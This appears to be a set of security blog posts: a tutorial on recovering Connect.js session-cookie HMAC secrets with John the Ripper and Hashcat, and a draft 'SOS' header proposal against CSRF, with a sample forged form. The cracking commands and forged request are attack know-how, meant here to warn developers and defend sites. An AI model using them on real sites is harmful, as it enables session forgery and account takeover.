The mechanisms used to protect secrets, such as encryption and hash functions, are intended to maximize an attacker’s effort at trying to reverse-engineer the secret. The choice of hash function has no appreciable effect on a dictionary-based brute force attack (at least not until your dictionary or a hybrid-based approach reaches the size of the target keyspace). In the long run of an exhaustive brute force search, a “bigger” hash like SHA-512 would take longer than SHA-256 or MD5. But that’s not the smart way to increase the attacker’s work factor.

Iterated hashing techniques are more effective at increasing the attacker’s work factor. Such techniques have a tunable property that may be adjusted with regard to the expected cracking speeds of an attacker. For example, in the PBKDF2 algorithm, both the HMAC algorithm and number of rounds can be changed, so an HMAC-SHA1 could be replaced by HMAC-SHA256 and 1,000 rounds could be increased to 10,000. (The changes would not be compatible with each other, so you would still need a migration plan when moving from one setting to another.)
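Here’s a quick Node.js sketch of that tunability (the parameter choices are illustrative, not recommendations):

var crypto = require('crypto');
// HMAC-SHA1 with 1,000 rounds...
var weak = crypto.pbkdf2Sync('passphrase', 'salt', 1000, 20, 'sha1');
// ...versus HMAC-SHA256 with 10,000 rounds; the outputs are incompatible,
// hence the need for a migration plan
var strong = crypto.pbkdf2Sync('passphrase', 'salt', 10000, 32, 'sha256');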

Of course, the choice of work factor must be balanced with a value you’re willing to encumber the site with. The number of “nonce” events for something like CSRF is far more frequent than the number of “hash” events for authentication. For example, a user may authenticate once in a one-hour period, but visit dozens of pages during that same time.

Our Secret

But none of that matters if you’re relying on a secret that’s easy to guess, like default passwords. And it doesn’t matter if you’ve chosen a nice, long passphrase that doesn’t appear in any dictionary if you’ve checked that password into a public source code repository.

In honor of the password cracking chapter of the upcoming AHT 4th Edition, we’ll briefly cover how to guess HMAC values.

We’ll use the Connect JavaScript library for Node.js as a target for this guesswork. It contains a CSRF countermeasure that relies on nonces generated via an HMAC. This doesn’t mean Connect.js implements the HMAC algorithm incorrectly or contains a design error; it just means that the security of an HMAC relies on the secrecy of its password. Developers should know this.

Here’s a snippet of the Connect.js code in action. Note the default secret, ‘keyboard cat’.

...
var app = connect()
  .use(connect.cookieParser())
  .use(connect.session({ secret: 'keyboard cat' }))
  .use(connect.bodyParser())
  .use(connect.csrf())
...

If you come across a web app that sets a connect.sess or connect.sid cookie, then it’s likely to have been created by this library. And it’s just as likely to be using a bad password for the HMAC. Let’s put that to the test with the following cookies.

Set-Cookie: connect.sess=s%3AGY4Xp1AWB5PVzYHCANaXHznO.PUvao3Y6%2FXxLAG%2Bp4xQEBAcbqMCJPACQUvS2WCfsmKU; Path=/; Expires=Fri, 28 Jun 2013 23:13:52 GMT; HttpOnly
Set-Cookie: connect.sid=s%3ATdF%2FriiKHfdilCTc4W5uAAhy.qTtH9ZL5pxgClGbZ0I0E3efJTrdC0jia6YxFh3cWKrU; path=/; expires=Fri, 28 Jun 2013 22:51:58 GMT; httpOnly
Set-Cookie: connect.sid=CJVZnS56R6NY8kenBhhIOq0h.0opeJzAPZ3efz0dw5YJrGqVv4Fi%2BWVIThEsGHMRqDw0; Path=/; HttpOnly

Everyone’s Secret

John the Ripper is a venerable password guessing tool with ancient roots in the security community. Its rule-based guessing techniques and speed make it a powerful tool for cracking passwords. In this case, we’re just interested in its ability to target the HMAC-SHA256 algorithm.

First, we need to reformat the cookies into a string that John recognizes. For these cookies, resolve the percent-encoded characters, replace the dot (.) with a hash (#). (Some of the cookies contained a JSON-encoded version of the session value, others contained only the session value.)

GY4Xp1AWB5PVzYHCANaXHznO#3d4bdaa3763afd7c4b006fa9e3140404071ba8c0893c009052f4b65827ec98a5
TdF/riiKHfdilCTc4W5uAAhy#a93b47f592f9a718029466d9d08d04dde7c94eb742d2389ae98c458777162ab5
CJVZnS56R6NY8kenBhhIOq0h#d28a5e27300f67779fcf4770e5826b1aa56fe058be595213844b061cc46a0f0d
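Each line pairs the session value with the hex form of the HMAC-SHA256 that Connect computed over it. As a reference point, here’s a minimal Node.js sketch of the check we’re asking John to brute force. It mirrors Connect’s cookie-signing scheme; 'keyboard cat' succeeds only if the app kept the default secret:

var crypto = require('crypto');
// Cookie format (URL-decoded): s:<sessionId>.<base64(HMAC-SHA256(sessionId, secret))>
function testSecret(sessionId, signature, guess) {
  var mac = crypto.createHmac('sha256', guess)
                  .update(sessionId)
                  .digest('base64')
                  .replace(/=+$/, '');   // Connect strips base64 padding
  return mac === signature;
}
testSecret('GY4Xp1AWB5PVzYHCANaXHznO',
           'PUvao3Y6/XxLAG+p4xQEBAcbqMCJPACQUvS2WCfsmKU', 'keyboard cat');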

Next, we unleash John against it. The first step might use a dictionary, such as a words.txt file you might have laying around. (The book covers more techniques and clever use of rules to target password patterns. John’s own documentation can also get you started.)
$ ./john --format=hmac-sha256 --wordlist=words.txt sids.john

Review your successes with the --show option.
$ ./john --show sids.john

Hashcat is another password guessing tool. It takes advantage of GPU processors to emphasize rate of guesses. It requires a slightly different format for the HMAC-SHA256 input file. The order of the password and salt is reversed from John, and it requires a colon separator.

3d4bdaa3763afd7c4b006fa9e3140404071ba8c0893c009052f4b65827ec98a5:GY4Xp1AWB5PVzYHCANaXHznO
a93b47f592f9a718029466d9d08d04dde7c94eb742d2389ae98c458777162ab5:TdF/riiKHfdilCTc4W5uAAhy
d28a5e27300f67779fcf4770e5826b1aa56fe058be595213844b061cc46a0f0d:CJVZnS56R6NY8kenBhhIOq0h

Hashcat uses numeric references to the algorithms it supports. The following command runs a dictionary attack against hash algorithm 1450, which is HMAC-SHA256.
$ ./hashcat-cli64.app -a 0 -m 1450 sids.hashcat words.txt

Review your successes with the --show option.
$ ./hashcat-cli64.app --show -a 0 -m 1450 sids.hashcat words.txt

Hold on! There’s movement in the brush. Let me check what beastie lurks there. I’ll be right back…

…And They Have a Plan

No notes are so disjointed as the ones skulking about my brain as I was preparing slides for last week’s BlackHat presentation. I’ve now wrangled them into a mostly coherent write-up.

This won’t be the last post on this topic. I’ll be doing two things over the next few weeks: throwing a doc into GitHub to track changes/recommendations/etc., responding to more questions, working on a different presentation, and trying to stick to the original plan (i.e. two things). Oh, and getting better at Markdown.

So, turn up some Jimi Hendrix, play some BSG in the background, and read on.

== The Problem ==

Cross-Site Request Forgery (CSRF) abuses the normal ability of browsers to make cross-origin requests by crafting a resource on one origin that causes a victim’s browser to make a request to another origin using the victim’s security context associated with that target origin.

The attacker creates and places a malicious resource on an origin unrelated to the target origin to which the victim’s browser will make a request. The malicious resource contains content that causes a browser to make a request to the unrelated target origin. That request contains parameters selected by the attacker to affect the victim’s security context with regard to the target origin.

The attacker does not need to violate the browser’s Same Origin Policy to generate the cross origin request. Nor does the attack require reading the response from the target origin. The victim’s browser automatically includes cookies associated with the target origin for which the forged request is being made. Thus, the attacker creates an action, the browser requests the action and the target web application performs the action under the context of the cookies it receives — the victim’s security context.

An effective CSRF attack means the request modifies the victim’s context with regard to the web application in a way that’s favorable to the attacker. For example, a CSRF attack may change the victim’s password for the web application.
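As a sketch, the malicious resource can be as plain as a self-submitting form. The target URL and field name here are hypothetical:

<!-- hosted on the attacker's origin; the browser attaches web.site's cookies -->
<form action="https://web.site/settings/password" method="POST">
  <input type="hidden" name="newPassword" value="owned9">
</form>
<script>document.forms[0].submit();</script>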

CSRF takes advantage of web applications that fail to enforce strong authorization of actions during a user’s session. The attack relies on the normal, expected behavior of web browsers to make cross-origin requests from resources they load on unrelated origins.

The browser’s Same Origin Policy prevents a resource in one origin from reading the response from an unrelated origin. However, the attack only depends on the forged request being submitted to the target web app under the victim’s security context — it does not depend on receiving or seeing the target app’s response.

== The Proposed Solution ==

SOS is proposed as an additional policy type of the Content Security Policy. It also includes pre-flight behavior as used by the Cross Origin Resource Sharing spec.

SOS isn’t just intended as a catchy acronym. The name is intended to evoke the SOS of Morse code, which is both easy to transmit and easy to understand. If it is required to explain what SOS stands for, then “Session Origin Security” would be preferred. (However, “Simple Origin Security”, “Some Other Security”, and even “Save Our Site” are acceptable. “Same Old Stuff” is discouraged. More options are left to the reader.)

An SOS policy may be applied to one or more cookies for a web application on a per-cookie or collective basis. The policy controls whether the browser includes those cookies during cross-origin requests. (A cross-origin resource cannot access a cookie from another origin, but it may generate a request that causes the cookie to be included.)

== Format ==

A web application sets a policy by including a Content-Security-Policy response header. This header may accompany the response that includes the Set-Cookie header for the cookie to be covered, or it may be set on a separate resource.

A policy for a single cookie would be set as follows, with the cookieName of the cookie and a directive of 'any', 'self', or 'isolate'. (Those directives will be defined shortly.)

Content-Security-Policy: sos-apply=cookieName 'policy'

A response may include multiple CSP headers, such as:

Content-Security-Policy: sos-apply=cookieOne 'policy'
Content-Security-Policy: sos-apply=cookieTwo 'policy'

A policy may be applied to all cookies by using a wildcard:

Content-Security-Policy: sos-apply=* 'policy'

== Policies ==

One of three directives may be assigned to a policy. The directives affect the browser’s default handling of cookies for cross-origin requests to a cookie’s destination origin. The pre-flight concept will be described in the next section; it provides a mechanism for making exceptions to a policy on a per-resource basis.

Policies are only invoked for cross-origin requests. Same origin requests are unaffected.

'any' — include the cookie. This represents how browsers currently work. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'self' — do not include the cookie. Make a pre-flight request to the resource on the destination origin to check for an exception response.

'isolate' — never include the cookie. Do not make a pre-flight request to the resource because no exceptions are allowed.

== Pre-Flight ==

A browser that is going to make a cross-origin request that includes a cookie covered by a policy of 'any' or 'self' must make a pre-flight check to the destination resource before conducting the request. (A policy of 'isolate' instructs the browser to never include the cookie during a cross-origin request.)

The purpose of a pre-flight request is to allow the destination origin to modify a policy on a per-resource basis. Thus, certain resources of a web app may allow or deny cookies from cross-origin requests despite the default policy.

The pre-flight request works identically to that for Cross Origin Resource Sharing, with the addition of an Access-Control-SOS header. This header includes a space-delimited list of cookies that the browser might otherwise include for a cross-origin request, as follows:

Access-Control-SOS: cookieOne cookieTwo

A pre-flight request might look like the following; note that the Origin header is expected to be present as well:

OPTIONS https://web.site/resource HTTP/1.1
Host: web.site
Origin: http://other.origin
Access-Control-SOS: sid
Connection: keep-alive
Content-Length: 0

The destination origin may respond with an Access-Control-SOS-Reply header that instructs the browser whether to include the cookie(s). The response will either be 'allow' or 'deny'.

The response header may also include an expiration in seconds. The expiration allows the browser to remember this response and forego subsequent pre-flight checks for the duration of the value.

The following example would allow the browser to include a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'self'. (In the absence of a reply header, the browser would not include the cookie.)

Access-Control-SOS-Reply: 'allow' expires=600

The following example would deny the browser to include a cookie with a cross-origin request to the destination origin even if the cookie’s policy had been 'any'. (In the absence of a reply header, the browser would include the cookie.)

Access-Control-SOS-Reply: 'deny' expires=0

The browser would be expected to track policies and policy exceptions based on destination origins. It would not be expected to track pairs of origins (e.g. different cross-origins to the destination) since such a mapping could easily become cumbersome, inefficient, and more prone to abuse or mistakes.

As described in this section, the pre-flight is an all-or-nothing affair. If multiple cookies are listed in the Access-Control-SOS header, then the response applies to all of them. This might not provide enough flexibility. On the other hand, simplicity tends to encourage security.
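To make the exchange concrete, here’s a hypothetical Node.js handler for the pre-flight. The SOS headers are part of this proposal, not any shipping API:

var http = require('http');
http.createServer(function(req, res) {
  if (req.method === 'OPTIONS' && req.headers['access-control-sos']) {
    // deny cross-origin cookies for the admin area, allow them elsewhere
    var reply = req.url.indexOf('/wp-admin/') === 0 ? "'deny'" : "'allow'";
    res.writeHead(200, { 'Access-Control-SOS-Reply': reply + ' expires=600' });
    return res.end();
  }
  // ...normal request handling...
  res.end();
}).listen(8080);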

== Benefits ==

Note that a policy can be applied on a per-cookie basis. If a policy-covered cookie is disallowed, any non-covered cookies for the destination origin may still be included. Think of a non-covered cookie as an unadorned or “naked” cookie — their behavior and that of the browser matches the web of today.

The intention of a policy is to control cookies associated with a user’s security context for the destination origin. For example, it would be a good idea to apply 'self' to a cookie used for authorization (and identification, depending on how tightly coupled those concepts are by the app’s reliance on the cookie).

Imagine a WordPress installation hosted at https://web.site/. The site’s owner wishes to allow anyone to visit, especially when linked-in from search engines, social media, and other sites of different origins. In this case, they may define a policy of 'any' set by the landing page:

Content-Security-Policy: sos-apply=sid 'any'

However, the /wp-admin/ directory represents sensitive functions that should only be accessed by intention of the user. WordPress provides a robust nonce-based anti-CSRF token. Unfortunately, many plugins forget to include these nonces and therefore become vulnerable to attack. Since the site owner has set a policy for the sid cookie (which represents the session ID), they could respond to any pre-flight request to the /wp-admin/ directory as follows:

Access-Control-SOS-Reply: 'deny' expires=86400

Thus, the /wp-admin/ directory would be protected from CSRF exploits because a browser would not include the sid cookie with a forged request.

The use case for the 'isolate' policy is straight-forward: the site does not expect any cross-origin requests to include cookies related to authentication or authorization. A bank or web-based email might desire this behavior. The intention of isolate is to avoid the requirement for a pre-flight request and to forbid exceptions to the policy.

== Notes ==

This is a draft. The following thoughts represent some areas that require more consideration or that convey some of the motivations behind this proposal.

This is intended to affect cross-origin requests made by a browser.

It is not intended to counter same-origin attacks such as HTML injection (XSS) or intermediation attacks such as sniffing. Attempting to solve multiple problems with this policy leads to folly.

CSRF evokes two senses of the word “forgery”: creation and counterfeiting. This approach doesn’t inhibit the creation of cross-origin requests (although something like “non-simple” XHR requests and CORS would). Nor does it inhibit the counterfeiting of requests, such as making it difficult for an attacker to guess values. It defeats CSRF by blocking a cookie that represents the user’s security context from being included in a cross-origin request the user likely didn’t intend to make.

There may be a reason to remove a policy from a cookie, in which case a CSP header could use something like an sos-remove instruction:

Content-Security-Policy: sos-remove=cookieName

Cryptographic constructs are avoided on purpose. Even if designed well, they are prone to implementation error. They must also be tracked and verified by the app, which exposes more chances for error and induces more overhead. Relying on nonces increases the difficulty of forging (as in counterfeiting) requests, whereas this proposed policy defines a clear binary of inclusion/exclusion for a cookie. A cookie will or will not be included vs. a nonce might or might not be predicted.

PRNG values are avoided on purpose, for the same reasons as cryptographic nonces. It’s worth noting that misunderstanding the difference between a random value and a cryptographically secure PRNG (which a CSRF token should favor) is another point against a PRNG-based control.

A CSP header was chosen in favor of decorating the cookie with new attributes because cookies are already ugly, clunky, and (somewhat) broken enough. Plus, the underlying goal is to protect a session or security context associated with a user. As such, there might be reason to extend this concept to the instantiation of Web Storage objects, e.g. forbid them in mixed-origin resources. However, this hasn’t really been thought through and probably adds more complexity without solving an actual problem.

The pre-flight request/response shouldn’t be a source of information leakage about cookies used by the app. At least, it shouldn’t provide more information than might be trivially obtained through other techniques.

It’s not clear what an ideal design pattern would be for deploying SOS headers. A policy could accompany each Set-Cookie header. Or the site could use a redirect or similar bottleneck to set policies from a single resource.

It would be much easier to retrofit these headers on a legacy app by using a Web App Firewall than it would be trying to modify code to include nonces everywhere.

It would be (possibly) easier to audit a site’s protection based on implementing the headers via mod_rewrite tricks or WAF rules that apply to whole groups of resources than it would for a code audit of each form and action.

The language here tilts (too much) towards formality, but the terms and usage haven’t been vetted yet to adhere to those in HTML, CSP and CORS. The goal right now is clarity of explanation; pedantry can wait.

== Cautions ==

In addition to the previous notes, these are highlighted as particular concerns.

Conflicting policies would cause confusion. For example, two different resources separately define an 'any' and 'self' for the same cookie. It would be necessary to determine which receives priority.

Cookies have the unfortunate property that they can belong to multiple origins (i.e. sub-domains). Hence, some apps might incur additional overhead of pre-flight requests or complexity in trying to distinguish cross-origin of unrelated domains and cross-origin of sub-domains.

Apps that rely on “Return To” URL parameters might not be fixed if the return URL has the CSRF exploit and the browser is now redirecting from the same origin. Maybe. This needs some investigation.

There’s no migration for old browsers: You’re secure (using a supporting browser and an adopted site) or you’re not. On the other hand, an old browser is an insecure browser anyway — browser exploits are more threatening than CSRF for many, many cases.

There’s something else I forgot to mention that I’m sure I’ll remember tomorrow.

=====

You’re still here? I’ll leave you with this quote from the last episode of BSG. (It’s a bit late to be apologizing for spoilers…) Thanks for reading!

Six: All of this has happened before.
Baltar: But the question remains, does all of this have to happen again?

BlackHat US 2013: Dissecting CSRF…

Here are the slides for my presentation at this year’s BlackHat US conference, Dissecting CSRF Attacks & Countermeasures. Thanks to everyone who came and to those who hung around afterwards to ask questions and discuss the content.

The major goal of this presentation was to propose a new way to leverage the concepts of Content Security Policy and Cross-Origin Resource Sharing to counter CSRF attacks. Essentially, we proposed a header that web apps could set to inform browsers when to include that app’s cookies during cross-origin requests. As always, slides alone don’t convey the nuances of the presentation. Stay tuned for a more thorough explanation of the concept.
